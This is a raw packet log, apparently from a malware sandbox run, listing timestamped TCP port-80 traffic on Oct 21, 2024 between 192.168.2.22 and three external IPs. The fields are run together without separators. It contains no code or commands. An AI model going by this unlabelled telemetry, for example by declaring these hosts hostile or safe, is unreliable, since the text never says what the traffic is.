                                                                                                  Oct 21, 2024 13:15:28.634476900 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634489059 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634493113 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634500980 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634505033 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634511948 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634521961 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634524107 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634535074 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634542942 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634558916 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634816885 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634828091 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634839058 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634855032 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634872913 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.676902056 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.676949978 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.676970005 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.676987886 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677011013 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677025080 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677026987 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677064896 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677087069 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677100897 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.677103996 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.677180052 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722358942 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722404003 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722419977 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722443104 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722457886 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722480059 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.722481012 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.722515106 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751065016 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751096964 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751132011 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751127958 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751163960 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751188040 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751188040 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751202106 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751427889 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751450062 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751471996 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751487017 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751496077 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751518011 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751526117 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751534939 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751552105 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751554966 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751569033 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751570940 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751585960 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751590014 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751601934 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751620054 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751754999 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751770020 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751786947 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751794100 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751816988 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751822948 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751838923 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751854897 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.751857996 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751873016 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.751885891 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752037048 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752052069 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752068996 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752075911 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752094984 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752110004 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752110004 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752127886 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752144098 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752145052 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752160072 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752161026 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752177000 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752181053 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752192020 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752194881 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752207994 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752228022 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752460957 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752477884 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752494097 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752504110 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752532005 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752532005 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752604961 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752643108 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752784014 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752815008 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752823114 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752831936 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752847910 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752847910 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752863884 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752866030 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752877951 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752881050 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752898932 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752902031 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752913952 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752914906 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752932072 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752933025 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752949953 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752949953 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752968073 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.752968073 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752980947 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.752995968 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753051996 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753360987 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753386021 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753402948 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753417015 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753427029 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753427029 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753432989 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753448963 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753457069 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753457069 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753464937 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753470898 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753479004 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.753484964 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753500938 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.753519058 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.795701981 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.795721054 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.795737982 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.795756102 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.795757055 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.795773983 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.795790911 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.795792103 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.795793056 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.795802116 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.795818090 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.840692997 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.840723038 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.840747118 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.840759993 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.840755939 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.840804100 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.840804100 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.840804100 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870022058 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870042086 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870058060 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870078087 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870078087 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870110989 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870127916 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870141029 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870155096 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870156050 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870170116 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870176077 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870191097 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870196104 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870302916 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870316982 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870332003 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870336056 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870347023 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870361090 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870368004 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870368004 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870378971 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870398045 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870402098 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870418072 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870431900 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870433092 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870446920 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870448112 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870464087 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870476961 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870702982 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870718002 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870733023 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870738983 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870748043 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.870758057 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.870771885 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:35.516705990 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:35.522139072 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:35.522233963 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:35.531753063 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:35.537255049 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:35.537291050 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:35.537377119 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:35.542671919 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.656853914 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.657042027 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.657075882 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.657092094 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:36.657109022 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.657145977 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.657154083 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:36.667457104 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.667488098 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.667511940 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:36.667521954 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.667555094 CEST8049170185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:36.667572021 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:36.867229939 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:37.038836956 CEST4917080192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:38.055409908 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:38.063123941 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:38.063235044 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:38.073076963 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:38.078934908 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.177099943 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.177135944 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.177150965 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.177167892 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.177182913 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.177208900 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:39.177365065 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:39.192526102 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.192573071 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.192589045 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.192603111 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.192616940 CEST8049171185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:39.192706108 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:39.192706108 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:39.192706108 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:39.581656933 CEST4917180192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:40.598587036 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:40.604012012 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:40.604199886 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:40.614125967 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:40.619573116 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:40.619643927 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:40.619705915 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:40.625025034 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:40.625200033 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.661010027 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.661076069 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.661127090 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.661127090 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:41.661161900 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.661190987 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.661206007 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:41.670401096 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.670464039 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.670469999 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:41.670496941 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.670530081 CEST8049172185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:41.670537949 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:41.874706030 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:42.124447107 CEST4917280192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:43.141225100 CEST4917380192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:43.146599054 CEST8049173185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:43.146678925 CEST4917380192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:43.153520107 CEST4917380192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:43.159041882 CEST8049173185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:44.221621037 CEST8049173185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:44.341008902 CEST8049173185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:44.341146946 CEST4917380192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:44.341974020 CEST4917380192.168.2.22185.174.173.22
                                                                                                  Oct 21, 2024 13:15:44.348522902 CEST8049173185.174.173.22192.168.2.22
                                                                                                  Oct 21, 2024 13:15:57.560928106 CEST4917480192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:15:57.566485882 CEST8049174162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:15:57.566549063 CEST4917480192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:15:57.576988935 CEST4917480192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:15:57.582662106 CEST8049174162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:15:57.582679033 CEST8049174162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:15:57.582706928 CEST4917480192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:15:57.588047981 CEST8049174162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:15:58.274892092 CEST8049174162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:15:58.317409992 CEST8049174162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:15:58.317615032 CEST4917480192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:15:59.081978083 CEST4917480192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:00.098859072 CEST4917580192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:00.104568005 CEST8049175162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:00.106412888 CEST4917580192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:00.138528109 CEST4917580192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:00.145064116 CEST8049175162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:00.784848928 CEST8049175162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:00.822601080 CEST8049175162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:00.822681904 CEST4917580192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:01.640343904 CEST4917580192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.656970978 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.662410975 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.662478924 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.673089027 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.679342985 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.679402113 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:02.679698944 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.684762001 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:02.684813976 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:03.356532097 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:03.394700050 CEST8049176162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:03.394757032 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:04.182859898 CEST4917680192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:05.199935913 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:06.452374935 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:06.452536106 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:06.459635019 CEST4917780192.168.2.22162.0.238.246
                                                                                                  Oct 21, 2024 13:16:06.465025902 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:07.149261951 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:07.187856913 CEST8049177162.0.238.246192.168.2.22
                                                                                                  Oct 21, 2024 13:16:07.187952042 CEST4917780192.168.2.22162.0.238.246
